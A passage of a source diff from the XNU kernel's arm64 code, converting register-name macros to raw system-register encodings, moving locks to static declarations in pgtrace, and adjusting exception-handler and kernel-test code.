        if ((pmcr0 & PMCR0_FIXED_EN) == 0) {
                panic("monotonic: counters disabled before idling, pmcr0 = 0x%llx\n", pmcr0);
        }
-       uint64_t pmcr1 = __builtin_arm_rsr64(PMCR1);
+       uint64_t pmcr1 = __builtin_arm_rsr64("PMCR1_EL1");
        if ((pmcr1 & PMCR1_INIT) == 0) {
                panic("monotonic: counter modes disabled before idling, pmcr1 = 0x%llx\n", pmcr1);
        }
 #endif /* DEBUG */
 
        /* disable counters before updating */
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
 
        mt_update_fixed_counts();
 }
@@ -348,7 +316,6 @@ static uintptr_t cpm_impl[MAX_NMONITORS] = {};
 #define UPMSR_OVF(R, CTR) ((R) >> ((CTR) + UPMSR_OVF_POS) & 0x1)
 #define UPMSR_OVF_MASK    (((UINT64_C(1) << UNCORE_NCTRS) - 1) << UPMSR_OVF_POS)
 
-#define UPMPCM "s3_7_c15_c5_4"
 #define UPMPCM_CORE(ID) (UINT64_C(1) << (ID))
 
 /*
@@ -488,8 +455,7 @@ uncmon_set_counting_locked_l(__unused unsigned int monid, uint64_t enctrmask)
         * UPMCR0 controls which counters are enabled and how interrupts are generated
         * for overflows.
         */
-#define UPMCR0 "s3_7_c15_c0_4"
-       __builtin_arm_wsr64(UPMCR0, UPMCR0_INIT | enctrmask);
+       __builtin_arm_wsr64("UPMCR0_EL1", UPMCR0_INIT | enctrmask);
 }
 
 #if UNCORE_PER_CLUSTER
@@ -519,25 +485,6 @@ uncmon_set_counting_locked_r(unsigned int monid, uint64_t enctrmask)
  * would be indexing into an array of strings.
  */
 
-#define UPMC0 "s3_7_c15_c7_4"
-#define UPMC1 "s3_7_c15_c8_4"
-#define UPMC2 "s3_7_c15_c9_4"
-#define UPMC3 "s3_7_c15_c10_4"
-#define UPMC4 "s3_7_c15_c11_4"
-#define UPMC5 "s3_7_c15_c12_4"
-#define UPMC6 "s3_7_c15_c13_4"
-#define UPMC7 "s3_7_c15_c14_4"
-#if UNCORE_NCTRS > 8
-#define UPMC8  "s3_7_c15_c0_5"
-#define UPMC9  "s3_7_c15_c1_5"
-#define UPMC10 "s3_7_c15_c2_5"
-#define UPMC11 "s3_7_c15_c3_5"
-#define UPMC12 "s3_7_c15_c4_5"
-#define UPMC13 "s3_7_c15_c5_5"
-#define UPMC14 "s3_7_c15_c6_5"
-#define UPMC15 "s3_7_c15_c7_5"
-#endif /* UNCORE_NCTRS > 8 */
-
 #define UPMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \
                X(6, A); X(7, A)
 #if UNCORE_NCTRS <= 8
@@ -553,7 +500,7 @@ uncmon_read_counter_locked_l(__unused unsigned int monid, unsigned int ctr)
 {
        assert(ctr < UNCORE_NCTRS);
        switch (ctr) {
-#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(UPMC ## CTR)
+#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(UPMC ## CTR))
                UPMC_ALL(UPMC_RD, 0);
 #undef UPMC_RD
        default:
@@ -570,7 +517,7 @@ uncmon_write_counter_locked_l(__unused unsigned int monid, unsigned int ctr,
        assert(ctr < UNCORE_NCTRS);
        switch (ctr) {
 #define UPMC_WR(CTR, COUNT) case (CTR): \
-               return __builtin_arm_wsr64(UPMC ## CTR, (COUNT))
+               return __builtin_arm_wsr64(__MSR_STR(UPMC ## CTR), (COUNT))
                UPMC_ALL(UPMC_WR, count);
 #undef UPMC_WR
        default:
@@ -632,12 +579,10 @@ uncmon_program_events_locked_l(unsigned int monid)
         * UPMESR[01] is the event selection register that determines which event a
         * counter will count.
         */
-#define UPMESR0 "s3_7_c15_c1_4"
-       CTRL_REG_SET(UPMESR0, uncore_config.uc_events.uce_regs[0]);
+       CTRL_REG_SET("UPMESR0_EL1", uncore_config.uc_events.uce_regs[0]);
 
 #if UNCORE_NCTRS > 8
-#define UPMESR1 "s3_7_c15_c11_5"
-       CTRL_REG_SET(UPMESR1, uncore_config.uc_events.uce_regs[1]);
+       CTRL_REG_SET("UPMESR1_EL1", uncore_config.uc_events.uce_regs[1]);
 #endif /* UNCORE_NCTRS > 8 */
 
        /*
@@ -649,21 +594,15 @@ uncmon_program_events_locked_l(unsigned int monid)
         * has a CPU ID of 4, it might be the first CPU in a cluster.  Shift the
         * registers right by the ID of the first CPU in the cluster.
         */
-#define UPMECM0 "s3_7_c15_c3_4"
-#define UPMECM1 "s3_7_c15_c4_4"
-
-       CTRL_REG_SET(UPMECM0,
+       CTRL_REG_SET("UPMECM0_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[0]);
-       CTRL_REG_SET(UPMECM1,
+       CTRL_REG_SET("UPMECM1_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[1]);
 
 #if UNCORE_NCTRS > 8
-#define UPMECM2 "s3_7_c15_c8_5"
-#define UPMECM3 "s3_7_c15_c9_5"
-
-       CTRL_REG_SET(UPMECM2,
+       CTRL_REG_SET("UPMECM2_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[2]);
-       CTRL_REG_SET(UPMECM3,
+       CTRL_REG_SET("UPMECM3_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[3]);
 #endif /* UNCORE_NCTRS > 8 */
 }
@@ -697,7 +636,7 @@ uncmon_program_events_locked_r(unsigned int monid)
 static void
 uncmon_clear_int_locked_l(__unused unsigned int monid)
 {
-       __builtin_arm_wsr64(UPMSR, 0);
+       __builtin_arm_wsr64("UPMSR_EL1", 0);
 }
 
 #if UNCORE_PER_CLUSTER
@@ -740,7 +679,7 @@ uncmon_init_locked_l(unsigned int monid)
         * UPMPCM defines the PMI core mask for the UPMCs -- which cores should
         * receive interrupts on overflow.
         */
-       CTRL_REG_SET(UPMPCM, uncmon_get_pmi_mask(monid));
+       CTRL_REG_SET("UPMPCM_EL1", uncmon_get_pmi_mask(monid));
        uncmon_set_counting_locked_l(monid,
            mt_uncore_enabled ? uncore_active_ctrs : 0);
 }
@@ -821,7 +760,7 @@ uncore_init(__unused mt_device_t dev)
 #endif /* UNCORE_PER_CLUSTER */
 
                struct uncore_monitor *mon = &uncore_monitors[monid];
-               lck_spin_init(&mon->um_lock, mt_lock_grp, NULL);
+               lck_spin_init(&mon->um_lock, &mt_lock_grp, LCK_ATTR_NULL);
 
                int intrs_en = uncmon_lock(mon);
                if (monid != curmonid) {
@@ -1261,7 +1200,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
        assert(cpu != NULL);
        assert(ml_get_interrupts_enabled() == FALSE);
 
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
        /*
         * Ensure the CPMU has flushed any increments at this point, so PMSR is up
         * to date.
@@ -1280,7 +1219,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
 #pragma unused(pmcr0)
 #endif /* !MONOTONIC_DEBUG */
 
-       uint64_t pmsr = __builtin_arm_rsr64(PMSR);
+       uint64_t pmsr = __builtin_arm_rsr64("PMSR_EL1");
 
 #if MONOTONIC_DEBUG
        printf("monotonic: cpu = %d, PMSR = 0x%llx, PMCR0 = 0x%llx\n",
@@ -1336,7 +1275,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
        }
 
 #if MACH_ASSERT
-       uint64_t pmsr_after_handling = __builtin_arm_rsr64(PMSR);
+       uint64_t pmsr_after_handling = __builtin_arm_rsr64("PMSR_EL1");
        if (pmsr_after_handling != 0) {
                unsigned int first_ctr_ovf = __builtin_ffsll(pmsr_after_handling) - 1;
                uint64_t count = 0;
@@ -1350,7 +1289,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
                panic("monotonic: PMI status not cleared on exit from handler, "
                    "PMSR = 0x%llx HANDLE -> -> 0x%llx, handled 0x%llx, "
                    "PMCR0 = 0x%llx, PMC%d = 0x%llx%s", pmsr, pmsr_after_handling,
-                   handled, __builtin_arm_rsr64(PMCR0), first_ctr_ovf, count, extra);
+                   handled, __builtin_arm_rsr64("PMCR0_EL1"), first_ctr_ovf, count, extra);
        }
 #endif /* MACH_ASSERT */
 
@@ -1366,7 +1305,7 @@ mt_cpmu_aic_pmi(cpu_id_t source)
                panic("monotonic: PMI from IOCPU %p delivered to %p", source,
                    curcpu->interrupt_nub);
        }
-       mt_cpu_pmi(curcpu, __builtin_arm_rsr64(PMCR0));
+       mt_cpu_pmi(curcpu, __builtin_arm_rsr64("PMCR0_EL1"));
 }
 #endif /* CPMU_AIC_PMI */
 
@@ -1393,7 +1332,7 @@ mt_microstackshot_start_remote(__unused void *arg)
 {
        cpu_data_t *cpu = getCpuDatap();
 
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
 
        for (int i = 0; i < MT_CORE_NFIXED; i++) {
                uint64_t count = mt_cpu_update_count(cpu, i);
index d13c8415bd2b1b436ea2104435779246011e3d60..d9b2d634c6faee3a29345e18be9ef1e532fc6b24 100644 (file)
@@ -70,7 +70,6 @@ static struct {
        log_t           *logs;          // Protect
        uint32_t        size;           // Protect
        uint64_t        rdidx, wridx;   // Protect
-       decl_simple_lock_data(, loglock);
 
        uint64_t id;
        uint32_t option;
@@ -78,12 +77,11 @@ static struct {
        uint32_t bytes;
 
        queue_head_t    probes;         // Protect
+} pgtrace;
 
-       lck_grp_t       *lock_grp;
-       lck_grp_attr_t  *lock_grp_attr;
-       lck_attr_t      *lock_attr;
-       lck_mtx_t       probelock;
-} pgtrace = {};
+static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock");
+static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp);
+static SIMPLE_LOCK_DECLARE(pgtrace_loglock, 0);
 
 //--------------------------------------------
 // Globals
@@ -91,14 +89,6 @@ static struct {
 void
 pgtrace_init(void)
 {
-       simple_lock_init(&pgtrace.loglock, 0);
-
-       pgtrace.lock_attr = lck_attr_alloc_init();
-       pgtrace.lock_grp_attr = lck_grp_attr_alloc_init();
-       pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr);
-
-       lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr);
-
        queue_init(&pgtrace.probes);
 
        pgtrace.size = RBUF_DEFAULT_SIZE;
@@ -111,7 +101,7 @@ pgtrace_clear_probe(void)
        probe_t *p, *next;
        queue_head_t *q = &pgtrace.probes;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        p = (probe_t *)queue_first(q);
        while (!queue_end(q, (queue_entry_t)p)) {
@@ -123,9 +113,7 @@ pgtrace_clear_probe(void)
                p = next;
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 int
@@ -148,9 +136,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end)
                p->pmap = vm_map_pmap(thread->map);
        }
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
        queue_enter(q, p, probe_t *, chain);
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        return 0;
 }
@@ -169,15 +157,13 @@ pgtrace_start(void)
 
        pgtrace.enabled = 1;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_add_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -188,13 +174,13 @@ pgtrace_stop(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_delete_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        pgtrace.enabled = 0;
 }
@@ -229,13 +215,13 @@ pgtrace_set_size(uint32_t size)
 
        pgtrace_stop();
 
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
        old_buf = pgtrace.logs;
        old_size = pgtrace.size;
        pgtrace.logs = new_buf;
        pgtrace.size = new_size;
        pgtrace.rdidx = pgtrace.wridx = 0;
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
 
        if (old_buf) {
                kfree(old_buf, old_size * sizeof(log_t));
@@ -247,9 +233,9 @@ pgtrace_set_size(uint32_t size)
 void
 pgtrace_clear_trace(void)
 {
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
        pgtrace.rdidx = pgtrace.wridx = 0;
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
 }
 
 boolean_t
@@ -304,7 +290,7 @@ pgtrace_write_log(pgtrace_run_result_t res)
 
        pgtrace.bytes += sizeof(log);
 
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
 
        pgtrace.logs[RBUF_IDX(pgtrace.wridx, pgtrace.size - 1)] = log;
 
@@ -320,9 +306,7 @@ pgtrace_write_log(pgtrace_run_result_t res)
                thread_wakeup(pgtrace.logs);
        }
 
-       simple_unlock(&pgtrace.loglock);
-
-       return;
+       simple_unlock(&pgtrace_loglock);
 }
 
 // pgtrace_read_log() is in user thread
@@ -345,13 +329,13 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
        }
 
        ints = ml_set_interrupts_enabled(FALSE);
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
 
        // Wait if ring is empty
        if (pgtrace.rdidx == pgtrace.wridx) {
                assert_wait(pgtrace.logs, THREAD_ABORTSAFE);
 
-               simple_unlock(&pgtrace.loglock);
+               simple_unlock(&pgtrace_loglock);
                ml_set_interrupts_enabled(ints);
 
                wr = thread_block(NULL);
@@ -360,7 +344,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
                }
 
                ints = ml_set_interrupts_enabled(FALSE);
-               simple_lock(&pgtrace.loglock);
+               simple_lock(&pgtrace_loglock);
        }
 
        // Trim the size
@@ -386,7 +370,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
 
        pgtrace.rdidx += total;
 
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
        ml_set_interrupts_enabled(ints);
 
        return total * sizeof(log_t);
@@ -412,12 +396,10 @@ static struct {
        decoder_t       *decoder;
        logger_t        *logger;
        queue_head_t    probes;
+} pgtrace;
 
-       lck_grp_t       *lock_grp;
-       lck_grp_attr_t  *lock_grp_attr;
-       lck_attr_t      *lock_attr;
-       lck_mtx_t       probelock;
-} pgtrace = {};
+static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock");
+static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp);
 
 //------------------------------------
 // functions for pmap fault handler
@@ -482,12 +464,6 @@ pgtrace_init(decoder_t *decoder, logger_t *logger)
                return EINVAL;
        }
 
-       pgtrace.lock_attr = lck_attr_alloc_init();
-       pgtrace.lock_grp_attr = lck_grp_attr_alloc_init();
-       pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr);
-
-       lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr);
-
        queue_init(&pgtrace.probes);
        pgtrace.decoder = decoder;
        pgtrace.logger = logger;
@@ -517,9 +493,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end)
                p->pmap = vm_map_pmap(thread->map);
        }
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
        queue_enter(q, p, probe_t *, chain);
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        return 0;
 }
@@ -532,7 +508,7 @@ pgtrace_clear_probe(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        p = (probe_t *)queue_first(q);
        while (!queue_end(q, (queue_entry_t)p)) {
@@ -544,9 +520,7 @@ pgtrace_clear_probe(void)
                p = next;
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -563,15 +537,13 @@ pgtrace_start(void)
 
        pgtrace.active = true;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_add_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -582,13 +554,13 @@ pgtrace_stop(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_delete_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        pgtrace.active = false;
 }
index 37eb2dda12ff00014e80d8448b97412dc8b4e6dd..f05b33b2d93b8a0da373ca1f70498b5842472917 100644 (file)
@@ -1050,6 +1050,7 @@ struct munger_test {
        {MT_FUNC(munge_wws), 3, 3, {MT_W_VAL, MT_W_VAL, MT_S_VAL}},
        {MT_FUNC(munge_wwwsw), 5, 5, {MT_W_VAL, MT_W_VAL, MT_W_VAL, MT_S_VAL, MT_W_VAL}},
        {MT_FUNC(munge_llllll), 12, 6, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}},
+       {MT_FUNC(munge_llll), 8, 4, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}},
        {MT_FUNC(munge_l), 2, 1, {MT_L_VAL}},
        {MT_FUNC(munge_lw), 3, 2, {MT_L_VAL, MT_W_VAL}},
        {MT_FUNC(munge_lwww), 5, 4, {MT_L_VAL, MT_W_VAL, MT_W_VAL, MT_W_VAL}},
@@ -1183,16 +1184,16 @@ arm64_ropjop_test()
 
        if (config_jop_enabled) {
                /* jop key */
-               uint64_t apiakey_hi = __builtin_arm_rsr64(ARM64_REG_APIAKEYHI_EL1);
-               uint64_t apiakey_lo = __builtin_arm_rsr64(ARM64_REG_APIAKEYLO_EL1);
+               uint64_t apiakey_hi = __builtin_arm_rsr64("APIAKEYHI_EL1");
+               uint64_t apiakey_lo = __builtin_arm_rsr64("APIAKEYLO_EL1");
 
                T_EXPECT(apiakey_hi != 0 && apiakey_lo != 0, NULL);
        }
 
        if (config_rop_enabled) {
                /* rop key */
-               uint64_t apibkey_hi = __builtin_arm_rsr64(ARM64_REG_APIBKEYHI_EL1);
-               uint64_t apibkey_lo = __builtin_arm_rsr64(ARM64_REG_APIBKEYLO_EL1);
+               uint64_t apibkey_hi = __builtin_arm_rsr64("APIBKEYHI_EL1");
+               uint64_t apibkey_lo = __builtin_arm_rsr64("APIBKEYLO_EL1");
 
                T_EXPECT(apibkey_hi != 0 && apibkey_lo != 0, NULL);
 
@@ -1617,13 +1618,13 @@ arm64_spr_lock_test()
                thread_block(THREAD_CONTINUE_NULL);
                T_LOG("Running SPR lock test on cpu %d\n", p->cpu_id);
 
-               uint64_t orig_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8));
+               uint64_t orig_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0));
                spr_lock_test_addr = (vm_offset_t)VM_KERNEL_STRIP_PTR(arm64_msr_lock_test);
                spr_lock_exception_esr = 0;
                arm64_msr_lock_test(~orig_value);
                T_EXPECT(spr_lock_exception_esr != 0, "MSR write generated synchronous abort");
 
-               uint64_t new_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8));
+               uint64_t new_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0));
                T_EXPECT(orig_value == new_value, "MSR write did not succeed");
 
                spr_lock_test_addr = 0;
index 5ec159e482a13f95a69db341f68447f12be509e4..7b41b508362d08dd5466e349320a603ddf99b00b 100644 (file)
@@ -34,6 +34,6 @@
        .align 2
        .globl EXT(arm64_msr_lock_test)
 LEXT(arm64_msr_lock_test)
-       msr             ARM64_REG_HID8, x0
+       msr             S3_0_C15_C8_0, x0
        ret
 #endif
index 307027f7c455f8b704e12fa0d3696169e5898c55..545142ba414bc24566d703351de6c1d61210a251 100644 (file)
 #define ARM_PTE_NX                 0x0040000000000000ULL /* value for no execute bit */
 #define ARM_PTE_NXMASK             0x0040000000000000ULL /* no execute mask */
 
+#define ARM_PTE_XMASK              (ARM_PTE_PNXMASK | ARM_PTE_NXMASK)
+
 #define ARM_PTE_WIRED              0x0400000000000000ULL /* value for software wired bit */
 #define ARM_PTE_WIRED_MASK         0x0400000000000000ULL /* software wired mask */
 
@@ -2057,6 +2059,19 @@ b.ne 1f
 1:
 .endmacro
 
+/*
+ * Wedges CPUs with a specified core that are below a specified revision.  This
+ * macro is intended for CPUs that have been deprecated in iBoot and may have
+ * incorrect behavior if they continue running xnu.
+ */
+.macro DEPRECATE_COREEQ_REVLO   core, rev, midr_el1, scratch
+EXEC_COREEQ_REVLO \core, \rev, \midr_el1, \scratch
+/* BEGIN IGNORE CODESTYLE */
+b .
+/* END IGNORE CODESTYLE */
+EXEC_END
+.endmacro
+
 /*
  * Sets bits in an SPR register.
  * arg0: Name of the register to be accessed.
index 51bd6a69b438a5c8576e60236957aad66866e6bc..a84e319f88c7496515a23aca6a83c7ce10e4bc62 100644 (file)
@@ -68,6 +68,7 @@
 
 
 
+
 #ifndef __arm64__
 #error Should only be compiling for arm64.
 #endif
@@ -109,6 +110,9 @@ void panic_with_thread_kernel_state(const char *msg, arm_saved_state_t *ss) __ab
 
 void sleh_synchronous_sp1(arm_context_t *, uint32_t, vm_offset_t) __abortlike;
 void sleh_synchronous(arm_context_t *, uint32_t, vm_offset_t);
+
+
+
 void sleh_irq(arm_saved_state_t *);
 void sleh_fiq(arm_saved_state_t *);
 void sleh_serror(arm_context_t *context, uint32_t esr, vm_offset_t far);
@@ -324,12 +328,12 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
 #if defined(NO_ECORE)
        uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf;
 
-       mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-       l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
-       lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-       fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+       mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+       l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
+       lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+       fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p\n"
@@ -343,13 +347,13 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
        uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf, mpidr, migsts;
 
        mpidr = __builtin_arm_rsr64("MPIDR_EL1");
-       migsts = __builtin_arm_rsr64(STR(ARM64_REG_MIGSTS_EL1));
-       mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-       l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
-       lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-       fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+       migsts = __builtin_arm_rsr64(STR(MIGSTS_EL1));
+       mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+       l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
+       lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+       fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p p-core?%d migsts=%p\n"
@@ -361,24 +365,24 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
 #else // !defined(NO_ECORE) && !defined(HAS_MIGSTS)
        uint64_t llc_err_sts, llc_err_adr, llc_err_inf, mpidr;
 #if defined(HAS_DPC_ERR)
-       uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_DPC_ERR_STS));
+       uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(S3_5_C15_C0_5));
 #endif // defined(HAS_DPC_ERR)
 
        mpidr = __builtin_arm_rsr64("MPIDR_EL1");
 
        if (mpidr & MPIDR_PNE) {
-               mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-               lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-               fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+               mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+               lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+               fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
        } else {
-               mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_MMU_ERR_STS));
-               lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_LSU_ERR_STS));
-               fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_FED_ERR_STS));
+               mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C2_0));
+               lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C2_0));
+               fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_2));
        }
 
-       llc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       llc_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       llc_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
+       llc_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       llc_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       llc_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p p-core?%d"
@@ -555,7 +559,7 @@ __attribute__((__always_inline__))
 static inline void
 task_vtimer_check(thread_t thread)
 {
-       if (__improbable(thread->task->vtimers)) {
+       if (__improbable((thread->task != NULL) && thread->task->vtimers)) {
                thread->ast |= AST_BSD;
                thread->machine.CpuDatap->cpu_pending_ast |= AST_BSD;
        }
@@ -893,6 +897,7 @@ handle_uncategorized(arm_saved_state_t *state)
                         */
                        DebuggerCall(exception, state);
 
+                       current_thread()->machine.kpcb = NULL;
                        (void) ml_set_interrupts_enabled(interrupt_state);
                        return;
                } else {
@@ -1292,9 +1297,9 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr
        thread->iotier_override = THROTTLE_LEVEL_NONE; /* Reset IO tier override before handling abort from userspace */
 
        if (is_vm_fault(fault_code)) {
-               kern_return_t   result = KERN_FAILURE;
                vm_map_t        map = thread->map;
                vm_offset_t     vm_fault_addr = fault_addr;
+               kern_return_t   result = KERN_FAILURE;
 
                assert(map != kernel_map);
 
@@ -1330,21 +1335,22 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr
                        }
                }
 #endif
-
                /* check to see if it is just a pmap ref/modify fault */
 
-               if ((result != KERN_SUCCESS) && !is_translation_fault(fault_code)) {
+               if (!is_translation_fault(fault_code)) {
                        result = arm_fast_fault(map->pmap,
                            vm_fault_addr,
                            fault_type, (fault_code == FSC_ACCESS_FLAG_FAULT_L3), TRUE);
                }
-               if (result != KERN_SUCCESS) {
-                       {
-                               /* We have to fault the page in */
-                               result = vm_fault(map, vm_fault_addr, fault_type,
-                                   /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE,
-                                   /* caller_pmap */ NULL, /* caller_pmap_addr */ 0);
-                       }
+               if (result == KERN_SUCCESS) {
